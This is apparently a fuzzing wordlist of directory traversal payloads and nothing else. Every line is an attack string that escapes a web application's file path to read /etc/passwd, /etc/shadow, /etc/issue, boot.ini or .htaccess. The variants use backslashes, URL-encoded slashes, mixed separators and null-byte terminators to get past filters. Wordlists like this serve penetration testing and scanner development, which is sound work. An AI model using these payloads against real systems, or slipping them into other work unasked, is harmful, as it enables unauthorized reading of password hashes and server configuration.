..\etc\passwd
..\etc\issue
..\boot.ini
..\..\etc\passwd
..\..\etc\issue
..\..\boot.ini
..\..\..\etc\passwd
..\..\..\etc\issue
..\..\..\boot.ini
..\..\..\..\etc\passwd
..\..\..\..\etc\issue
..\..\..\..\boot.ini
..\..\..\..\..\etc\passwd
..\..\..\..\..\etc\issue
..\..\..\..\..\boot.ini
..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\etc\issue
..\..\..\..\..\..\boot.ini
..%2fetc%2fpasswd
..%2fetc%2fissue
..%2fboot.ini
..%2f..%2fetc%2fpasswd
..%2f..%2fetc%2fissue
..%2f..%2fboot.ini
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fissue
..%2f..%2f..%2fboot.ini
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fissue
..%2f..%2f..%2f..%2fboot.ini
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fissue
..%2f..%2f..%2f..%2f..%2fboot.ini
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fissue
..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
